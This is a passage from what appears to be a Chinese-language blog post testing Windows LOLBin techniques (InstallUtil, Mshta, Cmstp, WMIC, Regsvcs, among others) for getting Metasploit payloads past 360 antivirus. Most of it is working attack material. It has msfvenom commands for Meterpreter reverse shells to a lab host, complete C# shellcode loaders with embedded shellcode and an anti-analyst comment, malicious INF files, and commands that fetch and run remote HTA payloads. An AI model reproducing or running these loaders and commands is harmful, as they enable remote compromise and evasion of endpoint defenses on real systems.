<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b &#x27;\x00&#x27; lhost=192.168.221.128 lport=4444 -f csharp</span><br></pre></td></tr></table></figure>

<p>InstallUtil-Shellcode.cs （Shellcode替换下）</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">using System;</span><br><span class="line">using System.Net;</span><br><span class="line">using System.Diagnostics;</span><br><span class="line">using System.Reflection;</span><br><span class="line">using System.Configuration.Install;</span><br><span class="line">using System.Runtime.InteropServices;</span><br><span class="line"> </span><br><span class="line">/*</span><br><span class="line">Author: Casey Smith, Twitter: @subTee</span><br><span class="line">License: BSD 3-Clause</span><br><span class="line">Step One:</span><br><span class="line">C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe  /unsafe /platform:x86 /out:exeshell.exe Shellcode.cs</span><br><span class="line">Step Two:</span><br><span class="line">C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe</span><br><span class="line">(Or)</span><br><span class="line">C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe</span><br><span class="line">	The gist of this one is we can exhibit one behaviour if the application is launched via normal method, Main().</span><br><span class="line">	Yet, when the Assembly is launched via InstallUtil.exe, it is loaded via Reflection and circumvents many whitelist controls.</span><br><span class="line">	We believe the root issue here is:</span><br><span class="line">	</span><br><span class="line">	The root issue here with Assembly.Load() is that at the point at which execute operations are detected </span><br><span class="line">	(CreateFileMapping-&gt;NtCreateSection), only read-only access to the section is requested, so it is not processed as an execute operation.  </span><br><span class="line">	Later, execute access is requested in the file mapping (MapViewOfFile-&gt;NtMapViewOfSection), </span><br><span class="line">	which results in the image being mapped as EXECUTE_WRITECOPY and subsequently allows unchecked execute access.</span><br><span class="line">	</span><br><span class="line">	The concern is this technique can circumvent many security products, so I wanted to make you aware and get any feedback.</span><br><span class="line">	Its not really an exploit, but just a creative way to launch an exe/assembly.</span><br><span class="line">*/</span><br><span class="line"> </span><br><span class="line">//root@infosec:~# msfvenom --payload windows/meterpreter/reverse_https LHOST=10.0.0.1 LPORT=443 -f csharp &gt; pentestShellCode.txt</span><br><span class="line"></span><br><span class="line">	public class Program</span><br><span class="line">	&#123;</span><br><span class="line">		public static void Main()</span><br><span class="line">		&#123;</span><br><span class="line">			Console.WriteLine(&quot;Hello From Main...I Don&#x27;t Do Anything&quot;);</span><br><span class="line">			//Add any behaviour here to throw off sandbox execution/analysts :)</span><br><span class="line">			</span><br><span class="line">		&#125;</span><br><span class="line">		</span><br><span class="line">	&#125;</span><br><span class="line">	</span><br><span class="line">	[System.ComponentModel.RunInstaller(true)]</span><br><span class="line">	public class Sample : System.Configuration.Install.Installer</span><br><span class="line">	&#123;</span><br><span class="line">	    //The Methods can be Uninstall/Install.  Install is transactional, and really unnecessary.</span><br><span class="line">	    public override void Uninstall(System.Collections.IDictionary savedState)</span><br><span class="line">	    &#123;</span><br><span class="line">		</span><br><span class="line">		Shellcode.Exec();</span><br><span class="line">	    	</span><br><span class="line">	    &#125;</span><br><span class="line">	    </span><br><span class="line">	&#125;</span><br><span class="line">	</span><br><span class="line">	public class Shellcode</span><br><span class="line">	&#123;</span><br><span class="line">			public static void Exec()</span><br><span class="line">			&#123;</span><br><span class="line">				// native function&#x27;s compiled code</span><br><span class="line">				// generated with metasploit</span><br><span class="line">                byte[] shellcode = new byte[516] &#123;</span><br><span class="line">0xbb,0xb5,0x9f,0x2d,0x3f,0xda,0xd6,0xd9,0x74,0x24,0xf4,0x5d,0x33,0xc9,0xb1,</span><br><span class="line">0x7b,0x31,0x5d,0x13,0x03,0x5d,0x13,0x83,0xc5,0xb1,0x7d,0xd8,0xe2,0x78,0x3b,</span><br><span class="line">0xf6,0x54,0x9d,0x5a,0x20,0x12,0x45,0x57,0x8d,0xf2,0x4c,0x26,0x46,0x34,0x19,</span><br><span class="line">0x50,0x24,0xf1,0xa1,0x61,0x7d,0xeb,0x9e,0xd9,0xdd,0xdb,0x71,0x74,0x3a,0x15,</span><br><span class="line">0x7d,0x07,0x5c,0x7e,0x27,0x3e,0x0e,0xa3,0xc4,0x73,0x6e,0xdf,0xac,0xbc,0x59,</span><br><span class="line">0x24,0x5b,0xd6,0x27,0x73,0xab,0x68,0xfd,0x45,0xb3,0xb2,0xe3,0x87,0xde,0x08,</span><br><span class="line">0x05,0xdc,0xbe,0xf5,0x0c,0xc0,0xca,0xe5,0x52,0x1a,0x9f,0x5b,0xb9,0x95,0x73,</span><br><span class="line">0x06,0x8e,0x47,0x44,0xd4,0x2d,0xd1,0xaa,0x34,0x61,0x83,0xc1,0xec,0xd4,0xde,</span><br><span class="line">0x96,0x42,0xed,0x83,0xc5,0xe0,0xf1,0x9d,0xf3,0x4f,0x38,0x7a,0x18,0xda,0x97,</span><br><span class="line">0x81,0x1b,0xf8,0xdf,0xf0,0x2d,0x5f,0x22,0xaa,0x35,0x2c,0x04,0xda,0xe5,0x33,</span><br><span class="line">0x0e,0x3e,0x23,0x8c,0x74,0xbd,0x09,0xc5,0xe4,0x9a,0x59,0x85,0x62,0x39,0x46,</span><br><span class="line">0x4c,0x92,0x74,0xa1,0x75,0x3e,0x67,0xa6,0xe5,0xf6,0x66,0x4f,0x4d,0x61,0xa2,</span><br><span class="line">0xd8,0x27,0xca,0xd6,0x08,0x5b,0x68,0x91,0x98,0x33,0xb8,0xfa,0x8d,0xd8,0x0d,</span><br><span class="line">0xf9,0xef,0x50,0xca,0xf1,0xae,0x5a,0x82,0xba,0xec,0xca,0x17,0xb2,0x5e,0x01,</span><br><span class="line">0xa6,0x8a,0x53,0xda,0x2a,0x4a,0x53,0x80,0xf5,0x2d,0x86,0x7c,0x02,0x71,0xa9,</span><br><span class="line">0x7d,0x91,0x6e,0x75,0xc7,0x2a,0x48,0xfd,0x03,0xe8,0x96,0x51,0x0b,0xfc,0x94,</span><br><span class="line">0xf7,0xab,0x6a,0x8f,0x23,0xc2,0xf5,0xc6,0xaf,0x1b,0x5d,0x82,0x94,0x51,0x44,</span><br><span class="line">0xa8,0xa8,0xea,0x72,0xd1,0xea,0xd2,0xde,0xb6,0x35,0x6b,0xdf,0xa9,0xeb,0x65,</span><br><span class="line">0x67,0xdf,0x64,0xf4,0xb2,0xeb,0xd4,0x32,0x65,0xe3,0x37,0x16,0xf8,0x8d,0x66,</span><br><span class="line">0x9f,0xdf,0x59,0xa8,0xce,0xbb,0x19,0x5b,0x55,0x8a,0xa0,0xb4,0xc5,0x4c,0x77,</span><br><span class="line">0xd9,0xca,0xf3,0x52,0x8a,0x9b,0x82,0x7b,0x19,0xf4,0x22,0xe8,0x04,0xba,0x8e,</span><br><span class="line">0xdb,0xfb,0x21,0xcf,0x2d,0x1c,0xb9,0xed,0xff,0x83,0x76,0xa7,0x12,0x77,0xec,</span><br><span class="line">0xbb,0x76,0x75,0xe9,0xec,0xd7,0xe1,0x68,0x2a,0x72,0x69,0xbb,0x6d,0xde,0x6f,</span><br><span class="line">0xbf,0x9c,0x49,0x43,0xef,0x7e,0xf7,0xfd,0x42,0x55,0x40,0xa1,0x3e,0xa9,0x81,</span><br><span class="line">0xce,0xf8,0xa3,0x21,0x35,0x85,0x4a,0x18,0x86,0xd0,0xa3,0x89,0x28,0x53,0xeb,</span><br><span class="line">0xa0,0x54,0x79,0x54,0x6b,0xd8,0xd1,0xff,0xe8,0x09,0x70,0xb2,0x9e,0x4e,0xd3,</span><br><span class="line">0x53,0x41,0xf3,0x90,0xd3,0x71,0xcb,0x70,0xa7,0x68,0x9c,0xd5,0x29,0xcb,0xcd,</span><br><span class="line">0x7f,0xc3,0xd1,0xd3,0x98,0x3b,0xa6,0x16,0x3b,0xc9,0x08,0xdd,0x19,0x48,0xf7,</span><br><span class="line">0xb8,0x2a,0x75,0x2a,0x9c,0x71,0x28,0x2d,0x53,0xfa,0xc3,0x55,0xa6,0x9b,0x22,</span><br><span class="line">0xe1,0xd4,0x06,0xbd,0x44,0xfc,0x39,0x01,0xf0,0x09,0x09,0xbf,0xe0,0x60,0xa7,</span><br><span class="line">0x2e,0xc1,0xf9,0x78,0x1f,0xfc,0xb2,0x3a,0xc5,0xe3,0x96,0xc1,0xf3,0x21,0x4c,</span><br><span class="line">0xb0,0xb0,0x64,0x24,0x6e,0x42,0x94,0x9e,0x0b,0x67,0xb1,0x2d,0x7c,0x44,0xea,</span><br><span class="line">0x0b,0x6a,0xad,0x35,0x67,0x23,0x12,0xcd,0xd8,0x5b,0x12,0xc5,0xf1,0xc7,0x15,</span><br><span class="line">0x51,0x14,0x85,0x32,0xe7,0x96,0xc6,0x92,0xb4,0x5e,0x60,0x8d,0x5d,0x7b,0x6f,</span><br><span class="line">0xb5,0x80,0x9e,0x9b,0x75,0x11 &#125;;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">	 </span><br><span class="line">				UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode .Length,</span><br><span class="line">									MEM_COMMIT, PAGE_EXECUTE_READWRITE);</span><br><span class="line">				Marshal.Copy(shellcode , 0, (IntPtr)(funcAddr), shellcode .Length);</span><br><span class="line">				IntPtr hThread = IntPtr.Zero;</span><br><span class="line">				UInt32 threadId = 0;</span><br><span class="line">				// prepare data</span><br><span class="line">	 </span><br><span class="line">	 </span><br><span class="line">				IntPtr pinfo = IntPtr.Zero;</span><br><span class="line">	 </span><br><span class="line">				// execute native code</span><br><span class="line">	 </span><br><span class="line">				hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);</span><br><span class="line">				WaitForSingleObject(hThread, 0xFFFFFFFF);</span><br><span class="line">	 </span><br><span class="line">		  &#125;</span><br><span class="line">	 </span><br><span class="line">			private static UInt32 MEM_COMMIT = 0x1000;</span><br><span class="line">	 </span><br><span class="line">			private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;</span><br><span class="line">	</span><br><span class="line">			[DllImport(&quot;kernel32&quot;)]</span><br><span class="line">        private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,</span><br><span class="line">             UInt32 size, UInt32 flAllocationType, UInt32 flProtect);</span><br><span class="line"> </span><br><span class="line">        [DllImport(&quot;kernel32&quot;)]</span><br><span class="line">        private static extern bool VirtualFree(IntPtr lpAddress,</span><br><span class="line">                              UInt32 dwSize, UInt32 dwFreeType);</span><br><span class="line"> </span><br><span class="line">        [DllImport(&quot;kernel32&quot;)]</span><br><span class="line">        private static extern IntPtr CreateThread(</span><br><span class="line"> </span><br><span class="line">          UInt32 lpThreadAttributes,</span><br><span class="line">          UInt32 dwStackSize,</span><br><span class="line">          UInt32 lpStartAddress,</span><br><span class="line">          IntPtr param,</span><br><span class="line">          UInt32 dwCreationFlags,</span><br><span class="line">          ref UInt32 lpThreadId</span><br><span class="line"> </span><br><span class="line">          );</span><br><span class="line">        [DllImport(&quot;kernel32&quot;)]</span><br><span class="line">        private static extern bool CloseHandle(IntPtr handle);</span><br><span class="line"> </span><br><span class="line">        [DllImport(&quot;kernel32&quot;)]</span><br><span class="line">        private static extern UInt32 WaitForSingleObject(</span><br><span class="line"> </span><br><span class="line">          IntPtr hHandle,</span><br><span class="line">          UInt32 dwMilliseconds</span><br><span class="line">          );</span><br><span class="line">        [DllImport(&quot;kernel32&quot;)]</span><br><span class="line">        private static extern IntPtr GetModuleHandle(</span><br><span class="line"> </span><br><span class="line">          string moduleName</span><br><span class="line"> </span><br><span class="line">          );</span><br><span class="line">        [DllImport(&quot;kernel32&quot;)]</span><br><span class="line">        private static extern UInt32 GetProcAddress(</span><br><span class="line"> </span><br><span class="line">          IntPtr hModule,</span><br><span class="line">          string procName</span><br><span class="line"> </span><br><span class="line">          );</span><br><span class="line">        [DllImport(&quot;kernel32&quot;)]</span><br><span class="line">        private static extern UInt32 LoadLibrary(</span><br><span class="line"> </span><br><span class="line">          string lpFileName</span><br><span class="line"> </span><br><span class="line">          );</span><br><span class="line">        [DllImport(&quot;kernel32&quot;)]</span><br><span class="line">        private static extern UInt32 GetLastError();</span><br><span class="line">			</span><br><span class="line">	 </span><br><span class="line">		&#125;</span><br></pre></td></tr></table></figure>

<p><code>CSC.exe</code>编译<code>InstallUtil-Shellcode.cs</code></p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:C:\test\shell.exe C:\test\InstallUtil-ShellCode.cs</span><br></pre></td></tr></table></figure>

<p>用<code>InstallUtil.exe</code>执行<code>shell.exe</code></p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U C:\test\shell.exe</span><br></pre></td></tr></table></figure>

<p>执行后360安全卫士有行为检测预警，允许则msf可上线</p>
<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220222165327639.png" alt="image-20220222165327639"></p>
<p>360杀毒静态可查杀</p>
<h2 id="Mshta-exe"><a href="#Mshta-exe" class="headerlink" title="Mshta.exe"></a>Mshta.exe</h2><p>用于执行<code>.hta</code>文件，但是在工具篇中hta的免杀效果比较一般</p>
<p>msf直接生成的hta用Mshta.exe还是会被查杀</p>
<h3 id="CACTUSTORCH"><a href="#CACTUSTORCH" class="headerlink" title="CACTUSTORCH"></a>CACTUSTORCH</h3><p>在<code>CACTUSTORCH.hta</code>的<code>binary</code>处，选择要注入的exe</p>
<p>生成32位shellcode</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">msfvenom -a x86 -p windows/meterpreter/reverse_https LHOST=192.168.221.128 LPORT=4444 -f raw -o payload.bin</span><br></pre></td></tr></table></figure>

<p>base64编码</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">cat payload.bin | base64 -w 0</span><br></pre></td></tr></table></figure>

<p>把编码后的code复制到<code>CACTUSTORCH.hta</code>的<code>code</code>处</p>
<p>Kali起一个服务，Win7执行</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">mshta.exe http://192.168.221.128/CACTUSTORCH.hta</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220222173052309.png" alt="image-20220222173052309"></p>
<p>360没有反应但是一直msf一直没上线，注入程序calc、rundll32都试过</p>
<p>拖到本地执行直接报毒了，Mshta.exe没有一个免杀成功的醉了</p>
<h2 id="Rundll32-exe"><a href="#Rundll32-exe" class="headerlink" title="Rundll32.exe"></a>Rundll32.exe</h2><p> 可执行32位的DLL文件，以命令行的方式调用动态链接库</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">Rundll32.exe DLLname,Functionname</span><br></pre></td></tr></table></figure>

<p>Rundll32.exe加载payload的免杀效果依赖于payload所做的免杀，且免杀效果一般通过行为检测来判断</p>
<p>MSFVenom和msf中SMB DElivery模块都可以生成恶意dll文件，但是执行都过不了行为检测</p>
<h2 id="Regsvr32-exe"><a href="#Regsvr32-exe" class="headerlink" title="Regsvr32.exe"></a>Regsvr32.exe</h2><p>Regsvr32是⼀个命令⾏实⽤程序，⽤于注册和取消注册OLE控件，例如Windows注册表中的DLL和ActiveX控件，以命令⾏⽅式运⾏</p>
<p>加载payload的原理就是通过JScript代码执行不同的命令，测试下来都过不了行为检测</p>
<h2 id="Cmstp-exe"><a href="#Cmstp-exe" class="headerlink" title="Cmstp.exe"></a>Cmstp.exe</h2><p>⽤于安装连接管理器服务配置⽂件的命令⾏程序。CMSTP.exe接受安装信息⽂件（INF）作为参数，并安装⽤于远程访问连接的服务配置⽂件。</p>
<h3 id="执行本地dll文件"><a href="#执行本地dll文件" class="headerlink" title="执行本地dll文件"></a>执行本地dll文件</h3><p>msfvenom生成DLL文件</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.221.128 LPORT=4444 -f dll -o test.dll</span><br></pre></td></tr></table></figure>

<p>cmstp.inf</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">[version]</span><br><span class="line">Signature=$chicago$</span><br><span class="line">AdvancedINF=2.5</span><br><span class="line">[DefaultInstall_SingleUser]</span><br><span class="line">RegisterOCXs=RegisterOCXSection</span><br><span class="line">[RegisterOCXSection]</span><br><span class="line">C:\test\test.dll</span><br><span class="line">[Strings]</span><br><span class="line">AppAct = &quot;SOFTWARE\Microsoft\Connection Manager&quot;</span><br><span class="line">ServiceName=&quot;Jasontt&quot;</span><br><span class="line">ShortSvcName=&quot;Jasontt&quot;</span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220222202231220.png" alt="image-20220222202231220"></p>
<p>行为检测预警，dll文件直接被360杀毒删除</p>
<h3 id="执行cmd命令"><a href="#执行cmd命令" class="headerlink" title="执行cmd命令"></a>执行cmd命令</h3><p>cmstp.inf</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">[version]</span><br><span class="line">Signature=$chicago$</span><br><span class="line">AdvancedINF=2.5</span><br><span class="line">[DefaultInstall_SingleUser]</span><br><span class="line">RegisterOCXs=RegisterOCXSection</span><br><span class="line">RunPreSetupCommands=RunPreSetupCommandsSection</span><br><span class="line">[RunPreSetupCommandsSection]</span><br><span class="line">c:\windows\system32\calc.exe</span><br><span class="line">[Strings]</span><br><span class="line">AppAct = &quot;SOFTWARE\Microsoft\Connection Manager&quot;</span><br><span class="line">ServiceName=&quot;Jasontt&quot;</span><br><span class="line">ShortSvcName=&quot;Jasontt&quot;</span><br></pre></td></tr></table></figure>

<p>就是把<code>RegisterOCXSection</code>换成<code>RunPreSetupCommandsSection</code>，直接执行cmd命令</p>
<p>行为检测预警为cmstp攻击</p>
<h3 id="下载并解析远程inf文件"><a href="#下载并解析远程inf文件" class="headerlink" title="下载并解析远程inf文件"></a>下载并解析远程inf文件</h3><p>行为检测同样过不了。。。</p>
<h2 id="FTP-exe"><a href="#FTP-exe" class="headerlink" title="FTP.exe"></a>FTP.exe</h2><p>提供基本的FTP访问</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">echo !calc.exe &gt; ftpcommands.txt &amp;&amp; ftp -s:ftpcommands.txt</span><br></pre></td></tr></table></figure>



<p>不会触发行为监测，但是请求的可执行程序没有做好免杀还是会被360查杀</p>
<h2 id="WMIC"><a href="#WMIC" class="headerlink" title="WMIC"></a>WMIC</h2><p>WMIC扩展<a href="https://baike.baidu.com/item/WMI">WMI</a>（Windows Management Instrumentation，Windows管理工具） ，提供了从<a href="https://baike.baidu.com/item/%E5%91%BD%E4%BB%A4%E8%A1%8C%E6%8E%A5%E5%8F%A3/18449233">命令行接口</a>和批命令脚本执行系统管理的支持</p>
<p>这个应该挺眼熟的，看过某些攻防类书籍一般会有这个</p>
<h3 id="远程加载payload"><a href="#远程加载payload" class="headerlink" title="远程加载payload"></a>远程加载payload</h3><p>生成一个hta文件</p>
<p>payload.xsl</p>
<figure class="highlight xml"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version=&#x27;1.0&#x27;?&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">stylesheet</span></span></span><br><span class="line"><span class="tag"><span class="attr">xmlns</span>=<span class="string">&quot;http://www.w3.org/1999/XSL/Transform&quot;</span> <span class="attr">xmlns:ms</span>=<span class="string">&quot;urn:schemasmicrosoft-com:xslt&quot;</span></span></span><br><span class="line"><span class="tag"><span class="attr">xmlns:user</span>=<span class="string">&quot;placeholder&quot;</span></span></span><br><span class="line"><span class="tag"><span class="attr">version</span>=<span class="string">&quot;1.0&quot;</span>&gt;</span> <span class="tag">&lt;<span class="name">output</span> <span class="attr">method</span>=<span class="string">&quot;text&quot;</span>/&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">ms:script</span> <span class="attr">implements-prefix</span>=<span class="string">&quot;user&quot;</span> <span class="attr">language</span>=<span class="string">&quot;JScript&quot;</span>&gt;</span></span><br><span class="line"> &lt;![CDATA[</span><br><span class="line"> var r = new</span><br><span class="line">ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;http://192.168.221.128:8088/TyPHLB3I.hta&quot;);</span><br><span class="line"> ]]&gt; <span class="tag">&lt;/<span class="name">ms:script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">stylesheet</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://blog-jasonttu.oss-cn-hangzhou.aliyuncs.com/img/image-20220222211320836.png" alt="image-20220222211320836"></p>
<p>执行后360预警wmic恶意命令执行攻击</p>
<h2 id="Regasm-exe-Regsvcs-exe"><a href="#Regasm-exe-Regsvcs-exe" class="headerlink" title="Regasm.exe/Regsvcs.exe"></a>Regasm.exe/Regsvcs.exe</h2><p>依赖环境：Microsoft.NET Framework v4.0.30319、Microsoft SDKs</p>
<p>Regsvcs和Regasm是Windows命令⾏实⽤程序，⽤于注册.NET组件对象模型(COM)程序集</p>
<p>生成C# shellcode</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.221.128 LPORT=4444 -f csharp</span><br></pre></td></tr></table></figure>

<p>regsvcs.cs</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">using System;</span><br><span class="line">using System.EnterpriseServices;</span><br><span class="line">using System.Runtime.InteropServices;</span><br><span class="line"></span><br><span class="line">/*</span><br><span class="line">Author: Casey Smith, Twitter: @subTee</span><br><span class="line">License: BSD 3-Clause</span><br><span class="line">Create Your Strong Name Key -&gt; key.snk</span><br><span class="line">$key = &#x27;BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=&#x27;</span><br><span class="line">$Content = [System.Convert]::FromBase64String($key)</span><br><span class="line">Set-Content key.snk -Value $Content -Encoding Byte</span><br><span class="line">C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk regsvcs.cs</span><br><span class="line">C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll </span><br><span class="line">[OR]</span><br><span class="line">C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll</span><br><span class="line">//Executes UnRegisterClass If you don&#x27;t have permissions</span><br><span class="line">C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll </span><br><span class="line">C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll</span><br><span class="line">//This calls the UnregisterClass Method</span><br><span class="line">*/</span><br><span class="line">namespace regsvcser</span><br><span class="line">&#123;</span><br><span class="line">    </span><br><span class="line">    public class Bypass : ServicedComponent</span><br><span class="line">    &#123;</span><br><span class="line">        public Bypass() &#123; Console.WriteLine(&quot;I am a basic COM Object&quot;); &#125;</span><br><span class="line">		</span><br><span class="line">		[ComRegisterFunction] //This executes if registration is successful</span><br><span class="line">		public static void RegisterClass ( string key )</span><br><span class="line">		&#123;</span><br><span class="line">			Console.WriteLine(&quot;I shouldn&#x27;t really execute&quot;);</span><br><span class="line">			Shellcode.Exec();</span><br><span class="line">		&#125;</span><br><span class="line">		</span><br><span class="line">		[ComUnregisterFunction] //This executes if registration fails</span><br><span class="line">		public static void UnRegisterClass ( string key )</span><br><span class="line">		&#123;</span><br><span class="line">			Console.WriteLine(&quot;I shouldn&#x27;t really execute either.&quot;);</span><br><span class="line">			Shellcode.Exec();</span><br><span class="line">		&#125;</span><br><span class="line">    &#125;</span><br><span class="line">	</span><br><span class="line">	public class Shellcode</span><br><span class="line">    &#123;</span><br><span class="line">        public static void Exec()</span><br><span class="line">        &#123;</span><br><span class="line">            // native function&#x27;s compiled code</span><br><span class="line">            // generated with metasploit</span><br><span class="line">            // executes calc.exe</span><br><span class="line">            byte[] shellcode = new byte[354] &#123;</span><br><span class="line">0xfc,0xe8,0x8f,0x00,0x00,0x00,0x60,0x31,0xd2,0x64,0x8b,0x52,0x30,0x89,0xe5,</span><br><span class="line">0x8b,0x52,0x0c,0x8b,0x52,0x14,0x31,0xff,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,</span><br><span class="line">0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0x49,</span><br><span class="line">0x75,0xef,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,</span><br><span class="line">0x85,0xc0,0x74,0x4c,0x01,0xd0,0x8b,0x58,0x20,0x50,0x8b,0x48,0x18,0x01,0xd3,</span><br><span class="line">0x85,0xc9,0x74,0x3c,0x31,0xff,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xc0,0xac,</span><br><span class="line">0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,</span><br><span class="line">0x75,0xe0,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,</span><br><span class="line">0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,</span><br><span class="line">0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xe9,0x80,0xff,0xff,0xff,0x5d,</span><br><span class="line">0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,</span><br><span class="line">0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,</span><br><span class="line">0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,0xc0,0xa8,0xdd,0x80,0x68,0x02,</span><br><span class="line">0x00,0x11,0x5c,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,</span><br><span class="line">0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,</span><br><span class="line">0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x67,0x00,0x00,</span><br><span class="line">0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,</span><br><span class="line">0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,</span><br><span class="line">0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,</span><br><span class="line">0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,0x58,0x68,0x00,</span><br><span class="line">0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,</span><br><span class="line">0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85,0x70,0xff,</span><br><span class="line">0xff,0xff,0xe9,0x9b,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,</span><br><span class="line">0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5 &#125;;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">            UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,</span><br><span class="line">                                MEM_COMMIT, PAGE_EXECUTE_READWRITE);</span><br><span class="line">            Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);</span><br><span class="line">            IntPtr hThread = IntPtr.Zero;</span><br><span class="line">            UInt32 threadId = 0;</span><br><span class="line">            // prepare data</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">            IntPtr pinfo = IntPtr.Zero;</span><br><span class="line"></span><br><span class="line">            // execute native 